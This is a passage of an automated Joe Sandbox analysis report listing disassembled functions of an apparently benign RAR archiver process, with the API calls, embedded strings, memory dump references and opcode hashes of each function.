                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                      • Instruction ID: 30856cc02a4eccb6c2de5f1483d34c1793fb5d5987d2faf4278b86d43feff0c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                      • Instruction Fuzzy Hash: B1E04F52F2930360EF58262298512BD02401FB6B84E165438EC1F86382EC5FA4B5DB6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE79FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                      • Instruction ID: 7a3631d0630dc34a9407b42dd33c7a9c015795302873286ea5bef30e7f7d92a6
                                                                                                                                                                      • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                      • Instruction Fuzzy Hash: 07D0176BE1A90385FF04CB80E8443301265AF3639AF830634E40C88150CFEF6064CA0A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE754538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE754549
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                      • Instruction ID: 1633531f10005b9d27d5bd6a2415a853488dcbe3bbe21812f5d609cccc3ba8d3
                                                                                                                                                                      • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                      • Instruction Fuzzy Hash: 31C02B23E0148180CF04532DD8452341110BF54735FE00330F13E451E0CF9940FF8305
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF6EE7567E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6EE7749F4: LoadStringW.USER32 ref: 00007FF6EE774A7B
                                                                                                                                                                        • Part of subcall function 00007FF6EE7749F4: LoadStringW.USER32 ref: 00007FF6EE774A94
                                                                                                                                                                        • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE756CB0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                      • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                      • API String ID: 668332963-4283793440
                                                                                                                                                                      • Opcode ID: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                      • Instruction ID: 7b3ea63ebc94451bdd0034caec71bf7752c848abda2dc4a8c3048d7607e295ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                      • Instruction Fuzzy Hash: 7322E523A0C6C255FF20DB64E8402F967A1FF61344F460036F64D8769ADEBEE569C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AEE9
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF01
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF19
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF75
                                                                                                                                                                      • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AFB0
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B23B
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B244
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B287
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                      • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                      • API String ID: 3483800833-4165214152
                                                                                                                                                                      • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                      • Instruction ID: c89d33d4942a49d6e90acd2bf04f192086e02c8cb16f77cae39d8b2adf83ac10
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                      • Instruction Fuzzy Hash: EEC18E23A09A8285EF20DF21E8403AD37A1FB64794F460035FA4D87799EFBED565C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 3729174658-3733053543
                                                                                                                                                                      • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                      • Instruction ID: 3641731fa419145691e72f56fd7156ece0f42a93fdd522013829378079dc66a0
                                                                                                                                                                      • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                      • Instruction Fuzzy Hash: 9521F633A1860242FF908B20E45537B7762FBA4704F525035F64E8659CDFBED469C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E298
                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E2AB
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E2F7
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EE74EE47), ref: 00007FF6EE74EF73
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6EE74EE47), ref: 00007FF6EE74EF84
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6EE74EFA7
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6EE74EFCA
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: GetLastError.KERNEL32 ref: 00007FF6EE74EFD4
                                                                                                                                                                        • Part of subcall function 00007FF6EE74EF50: CloseHandle.KERNEL32 ref: 00007FF6EE74EFE7
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF6EE74E357
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E362
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeBackupPrivilege
                                                                                                                                                                      • API String ID: 3094086963-2429070247
                                                                                                                                                                      • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction ID: 042f589ef1585c6e97f5e62f491f6d9200baa1d92f06defffd980cd8960264b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D633A0864186EF148B65E4443E93360FB643A4F414236FB6E9AAD4DFBDD166C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE76AF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleepswprintf
                                                                                                                                                                      • String ID: $%ls%0*u.rev
                                                                                                                                                                      • API String ID: 407366315-3491873314
                                                                                                                                                                      • Opcode ID: 25855a95eac825c785954cce864972a9ce0fc7f6a10ff8bf9b11e07335496b94
                                                                                                                                                                      • Instruction ID: 3cc2422f2ceb533d1d678050904527681b3abda4918abc61d2886b7e32da8f73
                                                                                                                                                                      • Opcode Fuzzy Hash: 25855a95eac825c785954cce864972a9ce0fc7f6a10ff8bf9b11e07335496b94
                                                                                                                                                                      • Instruction Fuzzy Hash: 85023533A0468286EF20DF25E4443AD77A5FB99788F020035EE5D8779AEEBEE451C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7349B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • new.LIBCMT ref: 00007FF6EE734BD8
                                                                                                                                                                        • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: CreateFileW.KERNELBASE ref: 00007FF6EE751F4A
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: GetLastError.KERNEL32 ref: 00007FF6EE751F59
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: CreateFileW.KERNELBASE ref: 00007FF6EE751F99
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: GetLastError.KERNEL32 ref: 00007FF6EE751FA2
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: SetFileTime.KERNEL32 ref: 00007FF6EE751FF1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                      • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                      • API String ID: 2965465231-221484280
                                                                                                                                                                      • Opcode ID: da7eeb6571ed9bba8ebcc7f74e29d7294f67c9c1e8ac790699657ab93618cb17
                                                                                                                                                                      • Instruction ID: fa527eb05ebe1ab9fe5d1174fc743f593a96142be35815511dcfb5fb79443c55
                                                                                                                                                                      • Opcode Fuzzy Hash: da7eeb6571ed9bba8ebcc7f74e29d7294f67c9c1e8ac790699657ab93618cb17
                                                                                                                                                                      • Instruction Fuzzy Hash: A3F1E123B09A4685EFA4DB11D4483BD63A1FB64B84F460031FA4D87785EFBED4A5C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE794C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
